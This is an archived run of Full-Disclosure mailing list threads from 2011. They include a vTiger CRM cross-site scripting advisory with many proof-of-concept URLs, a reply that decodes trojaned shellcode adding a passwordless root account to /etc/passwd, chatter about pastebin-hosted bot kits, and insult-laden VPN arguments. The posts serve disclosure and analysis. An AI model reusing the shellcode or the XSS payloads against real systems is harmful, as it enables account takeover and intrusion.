Re: [Full-disclosure] VPN providers and any providers in general...
http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
and i will find you :) he obv has a sshd scanner ready+waiting :) there is code tho... just NOT that 1. xd On 4 October 2011 01:54, adam a...@papsy.net wrote: /* KEEP PRIV8!! leak and i will find you :) ~ desg */ * * Probably should have been a good indication that he *wanted* you to run it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
perl -e 'print \xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44' �*^1��F�F �FG�vI��^M�^ �^Q�FU� ���NI�VÙ�/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd# /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash /etc/passwd Woot ;) On Mon, Oct 3, 2011 at 6:32 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 7:31 AM, Darren Martyn wrote: I regularly trawl Pastebin.com to find code - often idiots leave some 0day and similar there and it is nice to find. Well, seeing as I have no test boxes at the moment, can someone check this code in a VM? I am not sure if it is legit or not. http://pastebin.com/ygByEV2e Thanks :) ~Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Pretty sure its a trojan. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- LPTMS - CNRS - Université Paris-Sud tel : +33 (0)1 69 15 74 39 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
here are places like codepad.org that let you compile/execute various Indeed, i have seen the codepad.org execute action used on many many bots, even opastebin just using download= and, renaming the downloaded file :s not to hard, dfont even need to rename file, and, raw= featuires, is plain code just in a txt. on codepad tho, you can actually execute the code on the server, and, thats awesome for debugging i guess but, i prefer to use my own stdinout. anyhow, it is a nice world there, that is where half the bots in use sit... you should find some of the more popular botz, and strings, and watch howmany are active...many would be, believ it. specially on pastebin and codepad , those two are best because allow sraw download.. but, codepad, even allows you to setup a subdomain wich was removed from the pastebin , unf.. ohwell, thats how it is, it is ok by me. xd On 4 October 2011 07:14, adam a...@papsy.net wrote: Darren, There are places like codepad.org that let you compile/execute various programming/scripting languages, of course you don't have the control/access that you'd normally have but for some things - it may just be enough. On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: I may have to set up such an RSS + REGEX along with a google alerts to get the best of both :) Since my lack of computing facilities has gotten worse in the last month I have actually begun to forget ASM, so decoding shellcode is not so easy for me :( Nor do I have (currently) access to a Linux box to test it on - only a friends W7 laptop (which wants to use Cyrillic) and the college computers (W7 also... Network booting with Novell, buggy and slow for the win!) I will keep on posting anything that looks even mildly interesting, may find something fun in my travels :) On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly zpamh...@gmail.com wrote: OMG! This ... actually WORKS! GR8 Job, m8+! L33+ cC l33+ W00+ FB Bwana! ... ! connection reseted by peer [[ adam ]] @ [[ 03/10/2011 17:56 ]]-- Also, make sure you guys don't miss out on this 0day either: http://pastebin.com/R8XdsUgK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netvolution referer header SQL injection vulnerability
On 10/03/2011 01:47 PM, Dimitris Glynos wrote: As header field values are normally not included in HTTP transaction logs, an attack based on this vulnerability may go unnoticed by web server administrators. A correction: Although most header fields are not normally included in HTTP transaction logs, the referer one usually is. Hence the above argument holds true only for web servers with minimal logging setups (e.g. IIS 6.0 using IIS Log File Format). Cheers, Dimitris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in multiple themes for Drupal
/* Pardon my failure to thread this properly. I just subscribed so future responses can be threaded properly. */ http://seclists.org/fulldisclosure/2011/Oct/22 reports vulnerabilities in several themes based on the cumulus.swf file. That file is not present in those themes in the format distributed from drupal.org. For example, http://drupalcode.org/project/danland.git/tree/refs/heads/6.x-3.x shows there is no cumulus.swf in the danland theme which was one of the themes listed as vulnerable by mustlive. Since there is no vulnerability in these themes the Drupal Security Team will not be making an announcement about them. Regards, Greg Knaddison, a member of the Drupal Security Team speaking my own behalf -- Director Security Services Skype: greg.knaddison | http://twitter.com/greggles | http://acquia.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Free Koodhz Initiative
Well, you should know that Koodhz is a great guy, a young man with lot of ideals and he doesn't deserve to suffer the sentence. Koodhz has contributed a lot to black hat hacking. Software as w3af could not work'd without the active (but quiet) participation of this guy. So we ask you to help us continue our work so that more people know about this cause and help us free our friend. For your participation we will send a self-adhesive sticker for free. http://freekoodhz.com.ar/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Free Koodhz Initiative
sorry supporting people returded enough to get busted is not in this years budget.. try again in 2015 2011/10/4 Turro Sec turro...@gmail.com Well, you should know that Koodhz is a great guy, a young man with lot of ideals and he doesn't deserve to suffer the sentence. Koodhz has contributed a lot to black hat hacking. Software as w3af could not work'd without the active (but quiet) participation of this guy. So we ask you to help us continue our work so that more people know about this cause and help us free our friend. For your participation we will send a self-adhesive sticker for free. http://freekoodhz.com.ar/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] vTiger CRM 5.2.x = Multiple Cross Site Scripting Vulnerabilities
vTiger CRM 5.2.x = Multiple Cross Site Scripting Vulnerabilities
1. OVERVIEW
The vTiger CRM 5.2.1 and lower versions are vulnerable to Cross Site
Scripting. No fixed version has been released as of 2011-10-04.
2. BACKGROUND
vtiger CRM is a free, full-featured, 100% Open Source CRM software
ideal for small and medium businesses, with low-cost product support
available to production users that need reliable support. vtiger CRM
is a widely used product with thousands of users in dozens of
countries. It has a vibrant community of users driving the product
forward, and contributing to it's development. Over 2 million copies
of vtiger CRM have been downloaded so far. It was launched as a fork
of version 1.0 of the SugarCRM project launched on December 31st,
2004.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
4. VERSIONS AFFECTED
Tested on 5.2.1
5. PROOF-OF-CONCEPT/EXPLOIT
Cross Site Scripting
==
Browser: IE
---
Parameter: return_url
/index.php?module=com_vtiger_workflowaction=editworkflowworkflow_id=1return_url=scriptalert(/XSS/)/script
Parameter: workflow_id
/index.php?module=com_vtiger_workflowaction=editworkflowworkflow_id=1'scriptalert(/XSS/)/scriptreturn_url=1
Browser: ALL
--
Parameter: action
/phprint.php?module=Homeaction=--scriptalert(/xss/)/scriptparenttab=My
Home Pagescriptalert(0)/scriptjt=
Parameter: module
/phprint.php?module=--scriptalert(/xss/)/scriptaction=indexparenttab=My%20Home%20Pagejt=
Parameter: closingdate_end
/index.php?module=Potentialsaction=ListViewsales_stage=Prospectingclosingdate_start=2001-01-01closingdate_end=2100-01-01aa8ed'scriptalert(/xss/)/scripte8e16680dfcquery=truetype=dbrdowner=adminviewname=10
Parameter: closingdate_start parameter
/index.php?module=Potentialsaction=ListViewsales_stage=Prospectingclosingdate_start=2001-01-0189b81'scriptalert(1)/scriptclosingdate_end=2100-01-01query=truetype=dbrdowner=adminviewname=1
Parameter: contact_id
/index.php?module=Calendaraction=EditViewreturn_module=Contactsreturn_action=DetailViewactivity_mode=Eventsreturn_id=29contact_id=scriptalert(1)/scriptd3ef7f5e017account_id=16parenttab=Marketing
Parameter: date_closed
/index.php?module=Potentialsaction=ListViewdate_closed=2006-01'scriptalert(1)/scriptsales_stage=Otherquery=truetype=dbrdowner=adminviewname=10
Parameter: day
Note: Move your mouse over the input text box 'pagenum' , 1 of 1
/index.php?action=indexmodule=Calendarview=weekhour=0day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
Parameter: month
Note: Move your mouse over the input text box 'pagenum' , 1 of 1
/index.php?action=indexmodule=Calendarview=weekhour=0day=5month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22year=2010viewOption=listviewsubtab=eventparenttab=Myonlyforuser=1
Parameter: owner
Note: Move your mouse over the texts Potential No., Potential Name,..etc
/index.php?module=Potentialsaction=ListViewsales_stage=Prospectingclosingdate_start=2001-01-01closingdate_end=2100-01-01query=truetype=dbrdowner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27viewname=10
Parameter: leadsource
/index.php?module=Potentialsaction=ListViewleadsource=--None--'scriptalert(1)/scriptquery=truetype=dbrdviewname=10
Parameter: mode
/index.php?module=Settingsaction=profilePrivilegesmode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eparenttab=Settingsprofileid=1
Parameter: parent_id
/index.php?module=Calendaraction=EditViewreturn_module=Leadsreturn_action=DetailViewactivity_mode=Eventsreturn_id=37parent_id=37scriptalert(/XSS/)/scriptparenttab=Marketin
Parameter: profile_id
/index.php?module=Settingsaction=profilePrivilegesparenttab=Settingsprofileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1mode=view
Parameter: query
Note: Campaigns name 'test' must exist. Move your mouse over the 'edit' link.
/index.php?module=Campaignssearchtype=BasicSearchsearch_field=campaignnamequery=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007search_text=testaction=indexparenttab=Marketingsearch_cnt=
Parameter: sales_stage
/index.php?module=Potentialsaction=ListViewsales_stage=Prospect'scriptalert(/XSS/)/scriptxclosingdate_start=2001-01-01closingdate_end=2100-01-01query=truetype=dbrdowner=adminviewname=10
Parameter: start
Note: Move your mouse over the 'edit' link.
/index.php?action=ListViewmodule=Calendarrecord=116viewname=19start=1371b1%20onmouseover=alert(0)%20a%3db%22parenttab=My%20Home%20Page
Parameter: subtab
Note: Move your mouse over the Day, Week, Month, Year
Re: [Full-disclosure] VPN providers and any providers in general...
You are an idiot. On 4 October 2011 04:42, Antony widmal antony.wid...@gmail.com wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
Ok, well I suppose we can avoid spamming the list with our off topic ramblings and get back to the topic on hand (and behave like adults, which I assume all of you'se are), and clear up a few things up. VPN's and such can serve as a method to stop people on the local network from sniffing your connection (assuming a reliable encryption scheme is in place, and you have not been MITM-ed during the key exchange or whatever - crypto is NOT my interest!). However, we can reliably assume that the VPN provider can sniff your connection and compromise your safety per se, and that they WILL cooperate with Law Enforcement. Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as the VPS provider can simply take over the box. Etc. TL;DR, VPN's are not as safe as some believe for protecting ones anonymity. They WILL roll over for LEO and such. Not to mention threats on the LAN could compromise you, but I do not know much about how that works on the crypto side (however, if someone wants to enlighten me I would be grateful, it has piqued my curiosity!) Also, NOT surprised the provider rolled over in THAT case. *footnote for Christian, etc. I apologise for inciting a bit of off topic ranting, merely discussing morals, and how they affect people, and how often people do silly things when their logic/morality is compromised, often by narcotics and such. But that is for a discussion on morals and the psychology/sociology of cybercriminals. The ensuing debate about psychadelics and coding was probably my fault, but hey, people have varied interests, no? If we are going to act our age (adults, I presume) on this list at least display some tolerance for other peoples discussions, and keep the anger off the list. On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache 2.2.17 exploit?
Adam, thanks for the tip on Codepad, I am very grateful. Is there actually a non backdoored variant of said code? I have not seen any CVE mentioning that exploit so I was naturally wondering. Also, pastebin/pastee based bots (those scanner kits especially) are not too uncommon, I have found more than a few. I was working on dissecting kanbe.tar.gz from madirish.net when my hardware vanished, very interesting kit. I have a special place in my heart for those things, because one can easily find the botnets owners and report to their ISP (or whatever) or simply observe it (see how big it is). During the time after Kingcopes EXIM remote root exploit was released I saw a few kits appear, the first a energymech mod with a scanner and spreading exploit, another a self contained Perl script that spread itself ala worm. Within the following months more of the kits appeared, including the ones that have various x and x2 shell scripts that simply pass args and such to other scripts - fuck ugly things! I wonder though, when someone will write some kind of serious worm for *nix servers, some kind of self propegating, multiple spread/infection method worm, that infects, roots, and iFrames the whole site with malware spreading nastiness, along with whatever else the evil f*ckers want roots for. Something like Scalper except a bit nastier. Will be a fun day for malware dissection :) On Tue, Oct 4, 2011 at 12:22 AM, xD 0x41 sec...@gmail.com wrote: here are places like codepad.org that let you compile/execute various Indeed, i have seen the codepad.org execute action used on many many bots, even opastebin just using download= and, renaming the downloaded file :s not to hard, dfont even need to rename file, and, raw= featuires, is plain code just in a txt. on codepad tho, you can actually execute the code on the server, and, thats awesome for debugging i guess but, i prefer to use my own stdinout. anyhow, it is a nice world there, that is where half the bots in use sit... you should find some of the more popular botz, and strings, and watch howmany are active...many would be, believ it. specially on pastebin and codepad , those two are best because allow sraw download.. but, codepad, even allows you to setup a subdomain wich was removed from the pastebin , unf.. ohwell, thats how it is, it is ok by me. xd On 4 October 2011 07:14, adam a...@papsy.net wrote: Darren, There are places like codepad.org that let you compile/execute various programming/scripting languages, of course you don't have the control/access that you'd normally have but for some things - it may just be enough. On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: I may have to set up such an RSS + REGEX along with a google alerts to get the best of both :) Since my lack of computing facilities has gotten worse in the last month I have actually begun to forget ASM, so decoding shellcode is not so easy for me :( Nor do I have (currently) access to a Linux box to test it on - only a friends W7 laptop (which wants to use Cyrillic) and the college computers (W7 also... Network booting with Novell, buggy and slow for the win!) I will keep on posting anything that looks even mildly interesting, may find something fun in my travels :) On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly zpamh...@gmail.com wrote: OMG! This ... actually WORKS! GR8 Job, m8+! L33+ cC l33+ W00+ FB Bwana! ... ! connection reseted by peer [[ adam ]] @ [[ 03/10/2011 17:56 ]]-- Also, make sure you guys don't miss out on this 0day either: http://pastebin.com/R8XdsUgK ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] VPN providers and any providers in general...
In my eyes, a couple of offtopic messages is ok, but a train of several messages in less than an hour is what spam is... I must admit I was pissed off at that time, and the fact that some people failed to deal with such discussions appropriately only made it worse. Next time, launch your own thread for such discussions, so that people can easily manage/ignore what they don't need, instead of filling up legitimate threads with crap (imho). On Tue, Oct 4, 2011 at 11:27 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Ok, well I suppose we can avoid spamming the list with our off topic ramblings and get back to the topic on hand (and behave like adults, which I assume all of you'se are), and clear up a few things up. VPN's and such can serve as a method to stop people on the local network from sniffing your connection (assuming a reliable encryption scheme is in place, and you have not been MITM-ed during the key exchange or whatever - crypto is NOT my interest!). However, we can reliably assume that the VPN provider can sniff your connection and compromise your safety per se, and that they WILL cooperate with Law Enforcement. Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as the VPS provider can simply take over the box. Etc. TL;DR, VPN's are not as safe as some believe for protecting ones anonymity. They WILL roll over for LEO and such. Not to mention threats on the LAN could compromise you, but I do not know much about how that works on the crypto side (however, if someone wants to enlighten me I would be grateful, it has piqued my curiosity!) Also, NOT surprised the provider rolled over in THAT case. *footnote for Christian, etc. I apologise for inciting a bit of off topic ranting, merely discussing morals, and how they affect people, and how often people do silly things when their logic/morality is compromised, often by narcotics and such. But that is for a discussion on morals and the psychology/sociology of cybercriminals. The ensuing debate about psychadelics and coding was probably my fault, but hey, people have varied interests, no? If we are going to act our age (adults, I presume) on this list at least display some tolerance for other peoples discussions, and keep the anger off the list. On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs tyr...@gmail.com wrote: On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote: On 10/3/2011 10:42 AM, Antony widmal wrote: Using an external VPN provider to cover your trace clearly shows your incompetency and your idiot assumption. Trying to blame the VPN provider rather than accepting your mistake and learning from it clearly show your 3 years old mentality. Also, could you please stop posting as GLOW Xd as well ? We do not need your schizophrenic script kiddie lolololol, xD, hugs, spamming on this mailing list. You being on this mailing list is once again not the best idea. Thanks, Antony Actually XD and me are two different people. Second issues of privacy are always relevant, not understanding that law abiding individuals should always be concerned about companies that hand over personal info at the request of an authority figure are the ones with three year old mentalities. maybe they are law abiding companies? :) this whole fuss wouldn't have happened, if everybody could just stay a law abiding citizen. -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] VPN providers and any providers in general...
Honestly, i dont use VPN, dont know alot about them, but when a company says we will hide you..come to us.. , i guess some people take this, as a meaning that they can commit crime, wich is obviously not the case... I dont use VPN, I dont believe in them, i dont need them, and, I am NOT laurelai for the final time i will say to that idiotic kid trying to say i am, I do not speak in lololo , and anyone who knows me, would know i aint her/him, whoever it is. Anyhow, yes, well... i am slowly seeing that obviously, appearances can be very decieving , but then again, I would not expect to get away with crime on *any* service nowdays, it is crime afterall... and it is on the grander scale, according to press even, wich pushes it forward even harder.. anyhow, nite time here, sleeping time... but i will wake to a million emails i guess again :s it is a good tiopic, but also not an excuse for people to start putting up free *blah* and such, because some of these cases simply CANNOT be helped, by law... thats just how it is in some countries, they are stricter (once arrested), than when i guess some other countries are.. regarding europe, and arabic areas, and the jails there... i can only say, each case must be looked at very closesly, and then maybe see why in each case, athe arrest wasmade, and maybe there is some pattern... (the press...mainly). cheers,and gnite, xd On 4 October 2011 20:27, Darren Martyn d.martyn.fulldisclos...@gmail.comwrote: Ok, well I suppose we can avoid spamming the list with our off topic ramblings and get back to the topic on hand (and behave like adults, which I assume all of you'se are), and clear up a few things up. VPN's and such can serve as a method to stop people on the local network from sniffing your connection (assuming a reliable encryption scheme is in place, and you have not been MITM-ed during the key exchange or whatever - crypto is NOT my interest!). However, we can reliably assume that the VPN provider can sniff your connection and compromise your safety per se, and that they WILL cooperate with Law Enforcement. Even running your own VPN (OpenVPN) on a VPS you purchase is still risky, as the VPS provider can simply take over the box. Etc. TL;DR, VPN's are not as safe as some believe for protecting ones anonymity. They WILL roll over for LEO and such. Not to mention threats on the LAN could compromise you, but I do not know much about how that works on the crypto side (however, if someone wants to enlighten me I would be grateful, it has piqued my curiosity!) Also, NOT surprised the provider rolled over in THAT case. *footnote for Christian, etc. I apologise for inciting a bit of off topic ranting, merely discussing morals, and how they affect people, and how often people do silly things when their logic/morality is compromised, often by narcotics and such. But that is for a discussion on morals and the psychology/sociology of cybercriminals. The ensuing debate about psychadelics and coding was probably my fault, but hey, people have varied interests, no? If we are going to act our age (adults, I presume) on this list at least display some tolerance for other peoples discussions, and keep the anger off the list. On Tue, Oct 4, 2011 at 8:06 AM, Ferenc Kovacs tyr...@gmail.com wrote: http://vpn.hidemyass.com/vpncontrol/legal.html VPN Data What we store: Time stamp and IP address when you connect and disconnect to our service. ... Legalities Anonymity services such as ours do not exist to hide people from illegal activity. We will cooperate with law enforcement agencies if it has become evident that your account has been used for illegal activities. people should read the TOC, AUP and privacy policy especially if they are planning to use that service for illegal activities. As I mentioned before it is hard to expect that a VPN provider will risk his company for your $11.52/month, and maybe they would try it for some lesser case, but what Lulsec did was grant, so I'm not surprised that they bent. On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41 sec...@gmail.com wrote: maybe they are law abiding companies? :) Who were advertising themselves, and acting like they would NEVER do the dirty by handing over any payment records etc... wich is half the reason i believe the people use theose ones, advertising to protect you.. not to give your infos up, for really, no reason. as they did. Law abiding or not, then they should be advertising as a law abiding company, and not acting like some hackers-oparadise vpn service. xd On 4 October 2011 06:16, Ferenc Kovacs 